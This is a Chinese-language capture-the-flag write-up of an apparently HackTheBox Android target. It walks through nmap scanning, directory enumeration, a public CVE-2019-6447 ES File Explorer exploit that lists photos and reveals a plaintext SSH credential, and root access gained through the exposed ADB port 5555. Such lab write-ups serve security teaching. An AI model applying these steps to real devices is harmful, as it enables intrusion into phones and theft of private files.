信息收集
└─# nmap --min-rate=1000 -sV -sC 10.10.10.247
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-19 05:46 EDT
Nmap scan report for 10.10.10.247
Host is up (0.27s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_ 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp filtered freeciv
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port2222-TCP:V=7.91%I=7%D=10/19%Time=616E9415%P=x86_64-pc-linux-gnu%r(N
SF:ULL,24,"SSH-2\.0-SSH\x20Server\x20-\x20Banana\x20Studio\r\n");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.61 seconds
没有什么重要信息。全端口扫描
└─# nmap --min-rate=1000 -sV -sC 10.10.10.247 -p-
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-19 05:50 EDT
Nmap scan report for 10.10.10.247
Host is up (0.24s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_ 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp filtered freeciv
42135/tcp open http ES File Explorer Name Response httpd
|_http-server-header: ES Name Response Server
|_http-title: Site doesn't have a title (text/html).
43809/tcp open unknown
| fingerprint-strings:
| GenericLines:
| HTTP/1.0 400 Bad Request
| Date: Tue, 19 Oct 2021 09:51:28 GMT
| Content-Length: 22
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| GetRequest:
| HTTP/1.1 412 Precondition Failed
| Date: Tue, 19 Oct 2021 09:51:28 GMT
| Content-Length: 0
| HTTPOptions:
| HTTP/1.0 501 Not Implemented
| Date: Tue, 19 Oct 2021 09:51:34 GMT
| Content-Length: 29
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Method not supported: OPTIONS
| Help:
| HTTP/1.0 400 Bad Request
| Date: Tue, 19 Oct 2021 09:51:50 GMT
| Content-Length: 26
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line: HELP
| RTSPRequest:
| HTTP/1.0 400 Bad Request
| Date: Tue, 19 Oct 2021 09:51:34 GMT
| Content-Length: 39
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| valid protocol version: RTSP/1.0
| SSLSessionReq:
| HTTP/1.0 400 Bad Request
| Date: Tue, 19 Oct 2021 09:51:50 GMT
| Content-Length: 73
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| ?G???,???`~?
| ??{????w????<=?o?
| TLSSessionReq:
| HTTP/1.0 400 Bad Request
| Date: Tue, 19 Oct 2021 09:51:51 GMT
| Content-Length: 71
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| ??random1random2random3random4
| TerminalServerCookie:
| HTTP/1.0 400 Bad Request
| Date: Tue, 19 Oct 2021 09:51:51 GMT
| Content-Length: 54
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
|_ Cookie: mstshash=nmap
59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
关键信息
42135,59777,43809
| port | information |
|---|---|
| 42135 | ES File Explorer Name Response httpd |
| 43809 | unknown |
| 59777 | Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older |
└─# curl 10.10.10.247:59777
FORBIDDEN: No directory listing.
└─# curl 10.10.10.247:42135
curl: (7) Failed to connect to 10.10.10.247 port 42135: Connection refused
└─# curl 10.10.10.247:43809
curl: (7) Failed to connect to 10.10.10.247 port 43809: Connection refused
只有一个可以访问,扫下10.10.10.247:59777的目录
[06:10:02] 301 - 63B - /bin -> /bin/
[06:10:02] 403 - 32B - /bin/
[06:10:13] 301 - 67B - /cache -> /cache/
[06:10:13] 403 - 32B - /cache/
[06:10:36] 301 - 69B - /config -> /config/
[06:10:38] 403 - 32B - /config/
[06:10:49] 301 - 59B - /d -> /d/
[06:10:49] 301 - 65B - /data -> /data/
[06:10:49] 403 - 32B - /data/
[06:10:49] 403 - 32B - /data/cache/
[06:10:54] 301 - 63B - /dev -> /dev/
[06:10:54] 403 - 32B - /dev/
[06:11:02] 403 - 32B - /etc/
[06:11:02] 301 - 63B - /etc -> /etc/
[06:11:02] 200 - 56B - /etc/hosts
[06:11:18] 403 - 31B - /init/
[06:11:20] 403 - 48B - /javax.faces.resource.../WEB-INF/web.xml.jsf
[06:11:20] 403 - 48B - /javax.faces.resource.../
[06:11:24] 403 - 32B - /lib/
[06:11:25] 301 - 63B - /lib -> /lib/
[06:11:55] 200 - 0B - /proc/sys/kernel/core_pattern
[06:11:55] 301 - 71B - /product -> /product/
[06:11:57] 403 - 48B - /public..
[06:12:14] 403 - 48B - /static..
[06:12:15] 403 - 32B - /storage/
[06:12:15] 301 - 71B - /storage -> /storage/
[06:12:18] 301 - 69B - /system -> /system/
[06:12:19] 403 - 32B - /system/
[06:12:30] 403 - 32B - /vendor/ 感觉服务器是在根目录下的。。能进行文件读取。。
还有一个ES File Explorer Name Response httpd搜了一下发现一个exploit。
该exploit提供了不少可执行命令,可以进行一些命令操作,在人们的手机中经常会拍摄一些图片,这些图片、音频、视频等都有可能有关键信息。
cmds = ['listFiles','listPics','listVideos','listAudios','listApps','listAppsSystem','listAppsPhone','listAppsSdcard','listAppsAll','getFile','getDeviceInfo']└─# python3 ESFileReadexp.py listPics 10.10.10.247
==================================================================
| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |
| Coded By : Nehal a.k.a PwnerSec |
==================================================================
name : concept.jpg
time : 4/21/21 02:38:08 AM
location : /storage/emulated/0/DCIM/concept.jpg
size : 135.33 KB (138,573 Bytes)
name : anc.png
time : 4/21/21 02:37:50 AM
location : /storage/emulated/0/DCIM/anc.png
size : 6.24 KB (6,392 Bytes)
name : creds.jpg
time : 4/21/21 02:38:18 AM
location : /storage/emulated/0/DCIM/creds.jpg
size : 1.14 MB (1,200,401 Bytes)
name : 224_anc.png
time : 4/21/21 02:37:21 AM
location : /storage/emulated/0/DCIM/224_anc.png
size : 124.88 KB (127,876 Bytes)
username = kristi
password = Kr1sT!5h@Rp3xPl0r3!#这个字符的大小写我试了好几个密码
获取权限
ssh [email protected] -p 2222
:/ $ netstat -ant
Active Internet connections (established and servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp6 0 0 :::2222 :::* LISTEN
tcp6 0 0 :::5555 :::* LISTEN
tcp6 0 0 :::42135 :::* LISTEN
tcp6 0 0 ::ffff:10.10.10.2:42711 :::* LISTEN
tcp6 0 0 :::59777 :::* LISTEN
tcp6 0 0 ::ffff:127.0.0.1:44739 :::* LISTEN
tcp6 0 0 ::ffff:127.0.0.1:5555 ::ffff:127.0.0.1:59772 ESTABLISHED
tcp6 0 80 ::ffff:10.10.10.24:2222 ::ffff:10.10.14.70:1074 ESTABLISHED
tcp6 0 0 ::ffff:127.0.0.1:59424 ::ffff:127.0.0.1:5555 ESTABLISHED
tcp6 0 0 ::ffff:127.0.0.1:5555 ::ffff:127.0.0.1:59424 ESTABLISHED
tcp6 0 0 ::ffff:10.10.10.24:2222 ::ffff:10.10.14.7:11345 ESTABLISHED
tcp6 0 0 ::ffff:127.0.0.1:59772 ::ffff:127.0.0.1:5555 ESTABLISHED
tcp6 0 0 ::ffff:127.0.0.1:5555 ::ffff:127.0.0.1:59780 ESTABLISHED
tcp6 0 0 ::ffff:127.0.0.1:5555 ::ffff:127.0.0.1:59430 ESTABLISHED
tcp6 0 0 ::ffff:127.0.0.1:59426 ::ffff:127.0.0.1:5555 ESTABLISHED
tcp6 0 0 ::ffff:127.0.0.1:59780 ::ffff:127.0.0.1:5555 ESTABLISHED
tcp6 0 0 ::ffff:127.0.0.1:5555 ::ffff:127.0.0.1:59428 ESTABLISHED
tcp6 0 0 ::ffff:127.0.0.1:59428 ::ffff:127.0.0.1:5555 ESTABLISHED
tcp6 0 0 ::ffff:127.0.0.1:5555 ::ffff:127.0.0.1:59426 ESTABLISHED
tcp6 0 0 ::ffff:127.0.0.1:59430 ::ffff:127.0.0.1:5555 ESTABLISHED
发现用户开启了5555端口 常看一下是什么进程开启的。发现好像是一个sshserver。这么多5555还是安卓的。
登录一下我的安卓模拟器,发现这边也开了很多5555
搜一下,发现这是个桥接端口 。这可能是一个adb桥接用的端口。发现桥接用的配置文件/default.prop和/system/build.prop文件
Linux提权
尝试连接端口果然获取了root权限。如果没有获取root权限可以尝试adb.exe root。kali可以直接安装adb。
总结:
这是一个android的靶机,感觉还可以难度还可以(还好折腾过两个安卓模拟器)。生命在于折腾!
文章来源: https://mp.weixin.qq.com/s?__biz=MzU3MTU3NDk4Mw==&mid=2247484895&idx=1&sn=cb06dfbdf2abb7fead5531ce212f70e4&chksm=fcdf5a77cba8d36115980a019a3e962c870224d0ff2a2736ea8665df672247c46aa0137d8026&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh